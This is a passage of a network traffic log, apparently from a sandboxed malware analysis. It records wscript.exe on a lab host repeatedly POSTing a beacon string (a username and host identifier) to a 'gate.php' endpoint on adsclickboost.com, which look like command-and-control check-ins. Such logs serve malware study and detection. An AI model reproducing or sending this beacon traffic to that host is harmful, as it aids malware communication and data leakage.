Mar 9, 2021 09:21:46.203675032 CET	4909	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:46.554378033 CET	4911	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1cb7fa1b6640670879a607aa626332401615278106; expires=Thu, 08-Apr-21 08:21:46 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acfe79000005f55d2c1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4ct4ixDk1TmmLfkoOCt2PNHVGkPZCpV0cFYONjzqJGKggNTWf88mMFNXqcTrw5Pgv0%2BwZB6Y1Ner2L3qf1BAaIxUejqJZk4s2fuYkI9wS9iM%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e443fd3305f5-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49771	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:49.487282038 CET	4913	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:49.487341881 CET	4913	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:49.934945107 CET	4914	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=de99ee4098b20f73f2628b35f012e2fa41615278109; expires=Thu, 08-Apr-21 08:21:49 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad0b4e00003128e538b000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FKOQ1X3UZM4ft%2FY6bpsu8xjpIBOdV8aYO0Q%2B2wA%2Fh4RaK9lSAxvidOlZ2k8Wq8%2B6cHy5wwEz4aL3ebIAuyIUTvuVT7Ff3IuyZBN%2BwLysRb8IIA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e4587eed3128-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49772	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:53.811467886 CET	4920	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:53.811515093 CET	4920	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:54.155836105 CET	4922	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d49f78609062c47b52437fec22936d4931615278113; expires=Thu, 08-Apr-21 08:21:53 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad1c360000541b8a9d0000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MPBvFzltX3LE%2BU59%2BRs8w9VEWKc0cuTsE%2F0dYsD8Txgu4j3IfKJfGkmP%2BaafDP1TR%2Fn%2BwSv%2B5T0Tf2J227mM8acpFcPLn8xXElmml230N5Kiyg%3D%3D"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e4738ef7541b-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49773	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:54.103319883 CET	4921	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:54.103380919 CET	4921	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:54.451872110 CET	4923	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dfbb44a62292897171ea6899acc5815691615278114; expires=Thu, 08-Apr-21 08:21:54 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad1d5c000053a4d39d2000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ShRmD43XZRcdYLsgcogI4l6TaiA0qPH%2F6kAN7RG1yc2xrFQCHmQrrgoES1sVayNEqSkfw683vwte27ihJC2RbYXT%2FpMlL6FxB8YDPKaaIZLj6A%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e475681553a4-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49774	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:54.970089912 CET	4924	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:54.970299006 CET	4924	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:55.307497978 CET	4927	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d68f728e592757a4d9da5eb938354b1a91615278115; expires=Thu, 08-Apr-21 08:21:55 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad20b70000645b3825f000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oNcaJLQ6XmJUqFPjslC0%2FybtYT%2BJaEupqqELFDBoLqaOhIxJzWu4UpeEBnPuxZTdiG427F%2Bb9Kvzm9PDsw8htsjK5EHeMK8fr49CKXw3a%2BY%2BNw%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e47abffd645b-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49724	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:32.718812943 CET	1102	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:32.718858957 CET	1102	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:33.066905022 CET	1103	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d6139efa6ea60c84ad6ced738ddc376931615278032; expires=Thu, 08-Apr-21 08:20:32 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abdf6d00004e5b65046000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=y537lV6xGPBuTLuHRbfEc5JMMi0hgPw4ZbDq1iDEyEUzppMXyBACHJ6MdHl3zNeW8ca%2BTbMZ9q%2FZfvWHhGG0QomL8FXtD3gPFqBT83GKV4qbbA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e278ad824e5b-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49775	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:57.338397980 CET	4932	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:57.338500023 CET	4933	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:57.675682068 CET	4938	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d419da13eb0e198aad7dec1e2e87cc0691615278117; expires=Thu, 08-Apr-21 08:21:57 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad29f700004e79ff148000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6YfGzJSqy5bWfAX%2F2sqrJSV4xbkSPUB0Izvxz4rnNzKr2%2BUt0w8lRGxyiLh0bbwbq5M6FlbZOM%2Fp6lCgAVlSswRZCZKFCbVNlrHhnbq0C4X6Ig%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e4898d024e79-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49777	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:22:01.750751019 CET	4946	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:22:01.750794888 CET	4946	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:22:02.087807894 CET	4947	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20ee85a3f0955d30212990d14ce0feb21615278121; expires=Thu, 08-Apr-21 08:22:01 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad3b3400004e4f50005000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jjVDuANi30GJeji2FpaNukno5MyXN0tczdsUTNAW3b1F2Mvb2SCyV24YFLojnyneqJ1FVW4FXHDXpQbv9y2ylOW%2FY%2BHH%2FMZYfa6wR0SuoViOZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e4a52fa44e4f-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49778	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:22:03.173662901 CET	4948	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:22:03.173682928 CET	4948	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:22:03.508982897 CET	4949	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d590919ae69f6ba3d37b43913f390bc501615278123; expires=Thu, 08-Apr-21 08:22:03 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad40c300004a55df2fb000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=P8mDPB9xIOyk8NtoMsOWghJjZRzlZvhSUff4xBIY2KtFOt5e85%2BNbfJzd%2BOVRPSvIitDkRABd2aQsAHsgBxsMf7Zx2Swed99OGm4LAtcSxLroQ%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e4ae0f714a55-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49779	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:22:04.654583931 CET	4950	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:22:04.654609919 CET	4950	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:22:04.984672070 CET	4951	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d5f39ea1da4a77c26c45db87b473883d71615278124; expires=Thu, 08-Apr-21 08:22:04 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad468b00004dfaca249000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=49LZ4wwfO72VxfSYazETIhDu0QfyoI2GWfejrLXvg8yt%2BB5sEnzO0%2BCViE3WYZpqMtLb2teW%2BDsefNFrbj1rHmAq398cP1SF34ZBbJNLbWDQOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e4b74ee74dfa-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49780	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:22:05.474257946 CET	4952	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:22:05.474340916 CET	4952	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:22:05.823224068 CET	4953	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dbfebe049e4003a40d5a900f5dec544d91615278125; expires=Thu, 08-Apr-21 08:22:05 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad49c7000006e99316f000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qjwURkbPrvd%2FkSVuTUmrN3ZLF2eYW7FCPTNOKuVZ%2BWjD11z3GpqcTPy6LTKSqi3cpt2Egzgyg9SJCQ8edPBsHrORQli%2FjmcA%2FQIiyOV8VZMUXA%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e4bc7c8206e9-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49781	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:22:09.945657969 CET	4954	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:22:09.945677042 CET	4954	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:22:10.288165092 CET	4955	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:22:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3010089c9cf5f716c8cf69d70b70d3ed1615278129; expires=Thu, 08-Apr-21 08:22:09 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad5b380000062ddaa59000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ae0lVC3ohdj%2B%2BVQWh2Lp4mIDqU1olcMRTffwzIe66ZCktRnSyeyjFuipqq60Y7TLcTqpRPqLqbogUDVqExlzZxTsv0trWa28qVUAiPquD6tFFA%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e4d85e26062d-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	49782	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:22:11.762434006 CET	4956	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:22:11.762517929 CET	4956	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:22:12.098731041 CET	4957	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:22:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dbeadbf9a0b7e47baa693407c3598bbc21615278131; expires=Thu, 08-Apr-21 08:22:11 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ad624f00004e742d3bc000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pHlx29xXOfuYrznTuQ49ZOp3bt5WHiT4KsU9TkJZI4Xr4BQbo%2BKOC7IUelTV81T1sWL9Ql1TITL4lWdadiAw0QAjyB2v3lnDG3gypLdZWErxzw%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e4e3bc3b4e74-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49728	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:37.520031929 CET	1155	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:37.520055056 CET	1155	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:37.875382900 CET	1158	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dd09bdefb9270bb83b0f326f2033735881615278037; expires=Thu, 08-Apr-21 08:20:37 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abf22d0000324cf00d2000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fWOjUUYV%2BIqWm%2BqRCTF1ePYLeKvD9bBDPU1SVD83w%2BXcVwN8nzIiKX9piJBW9to%2FT6iNBhR9Y4rkIQcpEH4XJAL%2Bns0BW%2FBzFBpROl7Ed3tR4g%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e296aefa324c-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49729	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:39.104857922 CET	1170	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:39.104926109 CET	1170	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:39.445570946 CET	1171	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d250f31ec1bc0418e8504ebd3cbe278c51615278039; expires=Thu, 08-Apr-21 08:20:39 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abf85e00001f2d0ca96000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DQuMCFUqHwK1tx3H7wcid%2B7SNXWs9j8ChCqGUNuql2QLEgbj1h%2BZwo5kwgHwPlyiFe7ncZjk0BNPWsXFFGGYumG%2B81m8Q8GvzIOAeOuBWm96sg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e2a09c1d1f2d-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49730	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:40.710464001 CET	1172	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:40.710514069 CET	1172	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:41.073745966 CET	1173	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d2a352925754eb6312609243124810d0a1615278040; expires=Thu, 08-Apr-21 08:20:40 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abfea400002c192d880000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OHEFw%2FL4woK1YS0id%2FmRBo%2Fm6qkRXqV24inZHbWZtfxq8Fp%2BxIOnwywh3lzaBMCC7Rm0zYCmoAGXnC218U3U%2FuW1I4R393M6xMT84dRlnVjhfg%3D%3D"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e2aa9c092c19-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49732	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
